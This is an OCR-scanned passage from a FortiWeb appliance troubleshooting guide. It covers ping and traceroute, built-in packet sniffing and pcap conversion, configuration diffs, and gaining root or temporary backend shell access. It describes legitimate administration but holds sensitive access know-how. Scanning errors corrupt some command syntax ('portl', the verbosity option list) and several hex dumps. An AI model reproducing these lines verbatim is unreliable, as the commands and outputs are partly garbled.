The execute command has an immediate and decisive effect on your FortiWeb appliance and, for that reason,
should be used with care. Unlike config commands, most execute commands do not result in any configuration
change.

Execute session-cleanup

Just note this command will clear all current sessions by restart proxyd.

FortiWeb # execute session-cleanup
This operation will clean up all the sessions!
Do you want to continue? (y/n)y

Execute smart

Diagnose hard disk health status by using SMART tool

execute smart enable
execute smart self-test
execute smart test-process
execute smart test-result

Ping & Traceroute

If your FortiWeb appliance cannot connect to other hosts, try using ICMP (ping and traceroute) to determine if
the host is reachable or to locate the node of your network at which connectivity fails, such as when static routes
are incorrectly configured. You can do this from the FortiWeb appliance using CLI commands.

For example, you might use ping to determine that 192.0.2.87 is reachable:

execute ping 192.0.2.87

PING 192.0.2.87 (192.0.2.87): 56 data bytes

64 bytes from 192.0.2.87: icmp seq=0 ttl=64 time=2.4 ms
64 bytes from 192.0.2.87: icmp seqg=1 ttl=64 time=1.4 ms
64 bytes from 192.0.2.87: icmp seq=2 ttl=64 time=1.4 ms
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64 bytes from 192.0.2.87: icmp seq=3 ttl=64 time=0.8 ms
64 bytes from 192.0.2.87: icmp seqg=4 ttl=64 time=1.4 ms
---192.0.2.87 ping statistics ---

5 packets transmitted, 5 packets received, 0% packet loss
round-trip min/avg/max = 0.8/1.4/2.4 ms

or that 192.168.1.10 is not reachable:

execute ping 192.0.2.55

PING 192.0.2.55 (192.0.2.55): 56 data bytes

Timeout ...

Timeout ...

Timeout ...

Timeout ...

Timeout ...

---192.0.2.55 ping statistics ---

5 packets transmitted, 0 packets received, 100% packet loss

If the host is not reachable, you can use traceroute to determine the router hop or host at which the connection
fails:

execute traceroute 192.0.2.55
traceroute to 192.0.2.55 (192.0.2.55), 32 hops max, 72 byte packets
1 192.168.1.2 2 ms 0O ms 1 ms

2 *x  x ok

For details about CLI commands, see the FortiWeb CLI Reference:
https://docs.fortinet.com/product/fortiweb/

For details about troubleshooting connectivity, see Diagnosing Network Connectivity Issues.

vy
~ - Both ping and traceroute require that network nodes respond to ICMP. If you have
9 disabled responses to ICMP on your network, hosts may appear to be unreachable to
—y ping and traceroute, even if connections using other protocols can succeed.
-

Packet capture

Packet capture, also known as sniffing or packet analysis, records some or all of the packets seen by a network
interface (that is, the network interface is used in promiscuous mode). By recording packets, you can trace
connection states to the exact point at which they fail, which may help you to diagnose some types of problems
that are otherwise difficult to detect.

FortiWeb appliances have a built-in sniffer. Packet capture on FortiWeb appliances is similar to that of FortiGate
appliances. You can perform the packet capture through CLI command or Web Ul.
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Packet capture via CLI command

To use the built-in sniffer, connect to the CLI and enter the following command:

diagnose network sniffer [{any | <interface name>} [{none | '<filter str>'} [{1 | 2 |
31 4] 5 | 6} [<count int> <tsformat>]]]]

where:

e <interface name> is either the name of a network interface, such as port1, or enter any for all
interfaces.

o '<filter str>' isthe sniffer filter that specifies which protocols and port numbers that you do or do not
want to capture, such as 'tcp port 80',orenter none for nofilters. Filters use tcpdump
(http://www.tcpdump.org) syntax.

« {1 | 2 | 3}isanintegerindicating whether to display the network interface names, packet headers,
and/or payloads for each packet that the network interface sends, receives, or sees:

« 1—Display the packet capture timestamp, plus basic fields of the IP header: the source IP address, the
destination IP address, protocol name, and destination port number.

Does not display all fields of the IP header; it omits:
« |P version number bits
« Internet headerlength (ih1)
« Type of service/differentiated services code point (tos)
« Explicit congestion notification
« Total packet or fragment length
« PacketID
« |IP header checksum
o Timetolive (TTL)
. IPflag
« Fragment offset
« Options bits
« Forexample:
interfaces=[port2]

filters=[none]
0.655224 172.20.130.16.2264 -> 172.20.130.15.42574: udp 113

FWB # diagnose network sniffer portl "tcp port 80" 1

filters=[tcp port 80]

.586959 172.19.33.15.1082 -> 10.65.1.93.80: syn 370304845

.586991 10.65.1.93.80 -= 172.19.33.15.1082: syn 2254261780 ack 370304846
.587102 172.19.33.15.1082 -> 10.65.1.93.80: ack 2254261781

.587158 172.19.33.15.1082 -> 10.65.1.93.80: psh 370304846 ack 2254261781
.587167 10.65.1.93.80 -> 172.19.33.15.1082: ack 370304933

.587669 10.65.1.93.80 -= 172.19.33.15.1082: psh 2254261781 ack 370304933
.587765 172.19.33.15.1082 -> 10.65.1.93.80: ack 2254261994

.614443 172.19.33.15.1082 -= 10.65.1.93.80: fin 370304933 ack 2254261994
.614519 10.65.1.93.80 -> 172.19.33.15.1082: fin 2254261994 ack 370304934
.614626 172.19.33.15.1082 -> 10.65.1.93.80: ack 2254261995

| G 2 W W W W W W W W
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« 2—All of the output from 1, plus the packet payload in both hexadecimal and ASCII. For example:

FWB # diagnose network sniffer portl "tcp port 80" 2
filters=[tcp port 80]
4,682601 172.19.33.15.1118 -> 10.65.1.93.80: syn 240953163

0x0000 4500 003c lad5 0000 3fe6 8827 acl3 21ef E..<....7.."..1L.
0x0010 0a4l 015d 045e 0050 Oe5c a74b 0000 0000 ALLLCPNKL L
0x0020 a002 3908 e0bb 0000 0204 05b4 0402 08BOa . P

0x0030 0BOd 9316 0000 0OEO @103 @302 e

« 3—All of the output from 2, plus the link layer (Ethernet) header. e.g.:

FWB # diagnose network sniffer portl "tcp port 80" 3
filters=[tcp port 80]
5.896404 172.19.33.15.1160 -= 10.65.1.93.80: syn 11535359951

0x0000 0009 0fad 9801 906c ac95 9f7e 0BOO 4500 veessealoa.~..E.
0x0010 003c ladb 0000 3fe6 8821 acl3 216f Gadl Lonea o LA
0x0020 015d 0488 0050 44cl 9fef 0000 00OO abO2 J...PD..0o......
0x0030 3908 abc2 0000 0204 05b4 0402 080a OBOd Becicennnannnana
Ox0040 a45c 0000 0000 0103 O30a B

« 4—All of the output from 2, plus the ingress or egress interface.

FWB # diagnose network sniffer portl "tcp port 80" 4
filters=[tcp port 80]

interface=[portl]
2.985197 172.19.33.15.1170 -> 10.65.1.93.80: syn 1339018934

interface=[portl]
2.985231 10.65.1.93.80 -= 172.19.33.15.1170: syn 4031884093 ack 1339018935

« 5—All of the output from 2, plus the ingress or egress interface.
FWB # diagnose network sniffer portl "tcp port 80" 5
filters=[tcp port 80]
interface=[portl]
5.254139 172.19.33.15.1174 ->= 10.65.1.93.80: syn 3018448609

0x0000 4500 003c lae7 0000 3fee 8815 acl3 21of E..€uecea?uaaal,
0x0010 0ad4l 015d 0496 0050 b3e9 deel 0000 0000 AP
gx0e20 a002 3908 de09 0000 0204 05b4 0402 080a B
gx0e30 080d bB86c 0000 00OO 0103 030a B

« 6—All of the output from 3, plus the ingress or egress interface.
FWEB # diagnose network sniffer portl "tcp port BO" 6
filters=[tcp port 80]
interface=[portl]
3.495456 172.19.33.15.1217 -= 10.65.1.93.80: syn 1799303857

0x0000 0009 0fad 9801 906c ac95 9f7e 0800 4500 ....... l...~..E.
0x0010 003c laed 000Q 3fo6 880f acl3 210f 0adl eXusssTasuss 1..A
Bxobo2e 015d 04cl 0050 6b3f 32bl 0000 0000 alO2 J P72
0x0030 3908 cB15 0000 0204 05b4 0402 080a 080d L
0x0040 c310 0000 0GOOG 0103 @32  eeeeiaaas

« <count_int> isthe number of packets the sniffer reads before stopping. Packet capture output is printed
to your CLI display until you stop it by pressing Ctrl+C, or until it reaches the number of packets that you
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have specified to capture.

Packet capture can be very resource intensive. To minimize the performance
ﬂ impact on your FortiWeb appliance, use packet capture only during periods of
I minimal traffic, with a local console CLI connection rather than a Telnet or SSH

CLI connection, and be sure to stop the command when you are finished.

For example, you might capture all TCP port 443 (typically HTTPS) traffic occurring through port1, regardless of
its source or destination IP address. The capture uses a high level of verbosity (indicated by 3).

A specific number of packets to capture is not specified. As a result, the packet capture continues until the
administrator presses Ctrl+C. The sniffer then confirms that five packets were seen by that network interface.

(Verbose output can be very long. As a result, output shown below is truncated after only one packet.)

e <tsformat> is the format of timestamp.
 a:absolute UTC time, yyyy-mm-dd hh:mm:ss.ms

« otherwise: relative to the start of sniffing, ss.ms

FortiWeb# FortiWeb# diagnose network sniffer portl 'tcp port 443' 3
interfaces=[portl]

filters=[tcp port 443]

10.651905 192.168.0.1.50242 -> 192.168.0.2.443: syn 761714898
0x0000 0009 0f09 0001 0009 0£89 2914 0800 4500 .......... ) .. .E.
0x0010 003c 73dl 4000 4006 3bc6 dl57 fede acl6 .<s.@.@.;..W....
0x0020 0Oed8 c442 01lbb 2d66 d8dz 0000 0000 a002 ...B..-f........
0x0030 16d0 4£72 0000 0204 05b4 0402 080a 03ab ..0r............
0x0040 86bb 0000 0000 0103 0303 ..........

Instead of reading packet capture output directly in your CLI display, you usually should save the outputto a
plain text file using your CLI client. Saving the output provides several advantages. Packets can arrive more
rapidly than you may be able to read them in the buffer of your CLI display, and many protocols transfer data
using encodings other than US-ASCII. Itis often, but not always, preferable to analyze the output by loading it
into in a network protocol analyzer application such as Wireshark (http://www.wireshark.org).

For example, you could use PUTTY or Microsoft HyperTerminal to save the sniffer output to a file. Methods may
vary. See the documentation for your CLI client.

Requirements

« Terminal emulation software such as PuTTY
(http://www.chiark.greenend.org.uk/~sgtatham/putty/download.html)

« A plain text editor such as Notepad
o APerlinterpreter (http://www.perl.org/get.html)
« Network protocol analyzer software such as Wireshark (http://www.wireshark.org)

To view packet capture output using PuTTY and Wireshark

1.  Onyour management computer, start PuTTY.

2. Use PuTTY to connect to the FortiWeb appliance using either a local console, SSH, or Telnet connection.
For details, see the FortiWeb CLI Reference:
https://docs.fortinet.com/product/fortiweb/

3. Type the packet capture command, such as:
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diagnose network sniffer portl 'tcp port 443' 3

but do not press Enter yet.

In the upper left corner of the window, click the PUTTY icon to open its drop-down menu, then select
Change Settings. A dialog appears where you can configure PUuTTY to save output to a plain text file.

In the Category tree on the left, go to Session > Logging.

In Session logging, select Printable output.

In Log file name, click the Browse button, then choose a directory path and file name such as
C:\Users\MyAccount\packet capture.txt tosave the packet capture to a plain text file. (You do
not need to save it with the . 1og file extension.)

Click Apply.

Press Enter to send the CLI command to the FortiWeb appliance, beginning packet capture.

If you have not specified a number of packets to capture, when you have captured all packets that you want
to analyze, press Ctrl + C to stop the capture.

Close the PuTTY window.

Open the packet capture file using a plain text editor such as Notepad.

Delete the first and last lines, which look like this:
=~=~=~=~=~=~=~=~=~=~=~= PUTTY log 6/28/2022.07.25 11:34:40

FortiWeb-2000 #

These lines are a PuTTY timestamp and a command prompt, which are not part of the packet capture. If
you do not delete them, they could interfere with the script in the next step.

Convert the plain text file to a format recognizable by your network protocol analyzer application.

You can convert the plain text file to a format (. pcap) recognizable by Wireshark (formerly called Ethereal)
using the fgt2eth.pl Perl script. To download fgt2eth.pl, see the Fortinet Knowledge Base article
"Troubleshooting Tool: Using the FortiOS built-in packet sniffer
(http://kb.fortinet.com/kb/documentLink.do?externalld=11186).

The fgt2eth.pl scriptis provided as-is, without any implied warranty or
, technical support, and requires that you first install a Perl module
compatible with your operating system.

Touse fgt2eth.pl, open acommand prompt, then enter a command such as the following:
fgt2eth.pl -in packet capture.txt -out packet capture.pcap

where:

. fgt2eth.pl isthe name of the conversion script; include the path relative to the current directory,
which is indicated by the command prompt
« packet capture.txt isthe name of the packet capture’s output file; include the directory path
relative to your current directory
« packet capture.pcap is the name of the conversion script’s output file; include the directory path
relative to your current directory where you want the converted output to be saved
Open the converted file in your network protocol analyzer application. For further instructions, see the
documentation for that application.
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Viewing sniffer output in Wireshark

r

File Edit Wiew Go Capture Analvze  Statistics  Help
SEeee EEXSE I Ace»T LIEIE QB #EMR B
Filter: | ¥  Expression... Clear Apply
Mo, - Time Source Diestination Protocal Infa
1 0.000000 172.20.120.165 212.95.252.120 UDFP Source port: 47319 pestination port: ddi-udp-2
2 0.000101 172.20.120.165 82.71.226.65 UDFP Source port: 47319 pestination port: ddi-udp-2
3 0.000192 172.20.120.165 208.91.114.35 UDFP Source port: 47319 pestination port: ddi-udp-2
4 1.3591599 172.20.120.165 212.95.252.120 UDFP Source port: 47319 pestination port: ddi-udp-2
5 1.359213 172.20.120.165 82.71.226.65 UDFP Source port: 47319 pestination port: ddi-udp-2
6 1,359221 172.20.120.165 208.91.114.35 UDFP Source port: 47319 pestination port: ddi-udp-2
7 1.780492 172.20.120.165 82.71.226.65 UDFP Source port: 33112 rpestination port: ddi-udp-2
8 1.780507 172.20.120.165 208.91.114.35 UDFP Source port: 33112 rpestination port: ddi-udp-2
9 1.780517 172.20.120.165 212.95.252.120 UDFP Source port: 33112 rpestination port: ddi-udp-2
10 3.777948 172.20.120.165 82.71.226.65 UDFP Source port: 33112 rpestination port: ddi-udp-2
11 3.777959 172.20.120.165 208.91.114.35 UDFP Source port: 33112 rpestination port: ddi-udp-2
12 3.777967 172.20.120.165 212.95.252.120 UDFP Source port: 33112 rpestination port: ddi-udp-2
13 4.137705 172.20.120.165 212.95.252.120 UDFP Source port: 47319 pestination port: ddi-udp-2
14 4.157716 172.20.120.165 82.71.226.65 UDFP Source port: 47319 pestination port: ddi-udp-2
15 4.197723 172.20.120.165 208.91.114.35 UDFP Source port: 47319 pestination port: ddi-udp-2
16 5.675942 172.20.120.165 212.95.252.120 UDFP Source port: 47319 pestination port: ddi-udp-2
17 5.676953 172.20.120.165 82.71.226.65 upp Source port: 47319 Dpestination port: ddi-udo-2 [+
>
# Frame 1 (106 bytes on wire, 106 bytes captured)
+# Ethernet II, src: Fortinet_15:02:e8 (00:09:0f:15:02:e8), Dst: Fortinet_84:27:fe (00:09:0f:84:27:fe)
= Internet Protocol, Src: 172.20.120.165 (172.20.120.165), Dst: 212.95.252.120 (212.95.252.120)
version: 4
Header length: 20 bytes
4 Differentiated services Field: 0x00 (DsSCP 0x00: pefault; ECN: 0Ox0Q0) -
0000 00 09 Of 84 27 fe 00 09 oOf 15 02 &3 08 00 45 Q0 pee e e E.
0010 00 5¢ 00 00 40 00 40 11 44 ff ac 14 78 a5 d4 5 R - 1 - T o T
0020 fc 78 b8 d7 22 b9 00 48 92 32 65 68 72 Ga b3 <5 ¥ "UWH L 2ihrg..
0030 77 8¢ 2d 2f 5a 5 54 S5e 45 55 5hb 5F 42 5h 54 5F wl-/Z_TA EU[_B]T_
0040 45 59 6b 6a 77 6b 64 62 77 6C 6b 6a 77 2Zb 64 6e Evkjwkdn wlkjwtdn
0050 77 6c 6b §a 77 6b 64 €e 77 6c 6b da 77 6b 86 a9  wlk]lwkdn wlkJjwk..
0060 db 73 21 el 56 22 <6 18 7Fd éc LsovtoL 1

File: "C:\Documents and Settings\test\Deskkopfortimail_sniff pcap” 3684 Bybes 00:00;12

Packets: 30 Displayed: 30 Marked: 0

Profile: Default

For additional information on packet capture, see the Fortinet Knowledge Base article "Troubleshooting
Tool: Using the FortiOS built-in packet sniffer
(http://kb.fortinet.com/kb/documentLink.do?externalld=11186).

For more information on CLI commands, see the FortiWeb CLI Reference:

https://docs.fortinet.com/product/fortiweb/

Packet capture via Web Ul

1. Goto System > Network > Packet Capture.
2. Click Create New to create a new packet capture policy.
3. Configure these settings:

Interface

Filter

Maximum
Packet Count

Select the network interface on which you want to capture packets.

Specify which protocols and port numbers that you do or do not want to
capture, suchas 'tcp and port 80 and host IP1 and ( IP2
or IP3 )',orleave this field blank for no filters.
Note that please use the same filter expression as t cpdump for this filter,
you can refer to the Linux man page of TCPDUMP

(http://www.tcpdump.org/manpages/tcpdump.1.html).

Specify the maximum packets you want to capture for the policy. Capture

FortiWeb Trouble-shooting Guide

will stop automatically if the total captured packets hits the count.

181

Fortinet Technologies, Inc.


http://kb.fortinet.com/kb/documentLink.do?externalId=11186
https://docs.fortinet.com/product/fortiweb/
http://www.tcpdump.org/manpages/tcpdump.1.html

System tools & diagnose commands 182

4. Click OK.

5. Configure a packet capture policy from the policy table:

Interface

Filter
Packets
Maximum

Packet Count

Progress

Diff

The network interface on which the packet capture policy is applied.

The protocols and port numbers that the packet capture policy do or do
not want to capture.

Current captured packet count. This value keeps increasing during the
capture is running.

The maximum packets count of the policy.

Click the Start button aside No Running to start the capture.

During the capture processing, a progress bar is displayed to show the
progress to the maximum packet count. Count of captured packets is
displayed in Packets field.

Capture stops when hitting the maximum packet count, or you can click
the Stop button to stop the capture anytime. Captured packets will be
saved as a .pcap file.

Click the Download button to download the capture output file.

Click the Restart button to restart the capture.

You can compare backups of the core configuration file with your current configuration. This can be useful if, for

example:

« A previously configured feature is no longer functioning, and you are not sure what in the configuration has

changed.

« You want to recreate something configured previously, but do not remember what the settings were.

Difference programs can help you to quickly find all changes.

Configuration differences
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[-]=]x

| I File Edit View Merge Tools Plugins Window Help
BHsa B2 BXE|d ¢kt EDde
fwhb_system_vip_to_fortimailWebGUI conf - fwb_system_tp_vip_to...

CA\. ystem_vip_to_fortimailWebGULconf  C:\...\Backups\fwb_system_tp_vip_to_fortiMailWebGULconf
set ie6workaround disable set ieéworkaround disable
set language english set language english

set refresh 0 set refresh 0

end end
config system report-lang config system report-lang
edit "English" edit "English™
P T N P R

3

I et Amcerietdan TTmeT b -
<« |y  em
Ln:15 Col: 20/21 Ch: 20 1252 Unix Ln:1 Col1/75 Ch:1/75 1252 Unic

ntpserver
ntpsync
ntpserver
ntpsync

Diff Pane

J
40 Differences Found

-
o
3

There are many such difference-finding programs, such as WinMerge
(http://sourceforge.net/projects/winmerge) and the original diff (http://www.gnu.org/s/diffutils). They can
compare your configurations, line by line, and highlight parts that are new, modified, or deleted.

For instructions, see your difference program’s documentation.

Run backend-shell commands

Sometimes we need to login to FortiWeb backend shell to check logs or collect some specific files. Though we
expect all useful logs are collected or archived in the debug log file or can be downloaded from System >
Maintenance > Backup & Restore > GUI File Download, some files especially logs for new features may not
be included, so you may have to login to the backend shell to collect these logs or execute some commands, for
example, executing curl to verify if the backend servers is reachable.

Login to backend shell on 6.4 or 6.3 builds

It's simple but really dangerous. The admin user can login to the backend shell with the root permission just by
executing “fn sh”.

FortiWeb # fn sh

/# pwd

/

/# whoami
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root

Login to backend shell on 7.0.0 and later builds

To access the backend shell, you need to enable shell-access and create a temporary user/password through
CLI first, then login via SSH.

config system global

set shell-access enable

set shell-username <user name>

set shell-password <password>
set shell-timeout 1200 #Optional
end

Login from remote PC:

ssh <user name>@<x.x.X.x>

Login from local FortiWeb:

FortiWeb # fn ssh test@localhost #or replace localhost as local IP address; “test”
is the username

shell@localhost's password:

-— WARNING! All configurations should be done through CLI shell.

-- You now have full access.

~# whoami

test

Note: With this secure shell access changes on 7.0.0, only normal users, that is, the user created as shell-
username can access backend shell instead of root user. And accordingly, only the permission of /bin and
Ivar/log/gui_upload is writable. That means you can do the binary/daemon replacement for debugging in 7.0. or
copy/move file to /var/log/gui_upload, but may have no permission to operate or write in other system
directories.

Use “fn <command>" in CLI to execute backend commands

To simplify, you can execute some commonly used backend commands directly in FortiWeb CLI, without
enabling shell-access and adding username/password.

FortiWeb # fn

Below are the usable commands:

basename cat date df dmesg

du ifconfig netstat nslookup ping

sleep uname ps kill killall

lspci df fdisk mount free

lsusb insmod mknod smartctl MegaCli ssh dmidecode pstack
strace tcpdump gdb

FortiWeb # fn df -h

Filesystem Size Used Available Use% Mounted on
/dev/root 472 .5M 358.2M 114.4M 76% /

none 1.1G 44 ,3M 1.1G 4% /tmp

none 3.8G 3.0M 3.8G 0% /dev/shm
/dev/sda2 362.4M 271.5M 71.3M 79% /data
/dev/sda3 90.6M 56.0K 85.6M 0% /home
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/dev/sda4 30.5G 4.1G 24.9G 14% /var/log

Upload a file to or download a file from FortiWeb

The upload and download method has already been stated in Customizing&downloading debug logs on page
70 and Collecting core/coredump files and logs on page 76.
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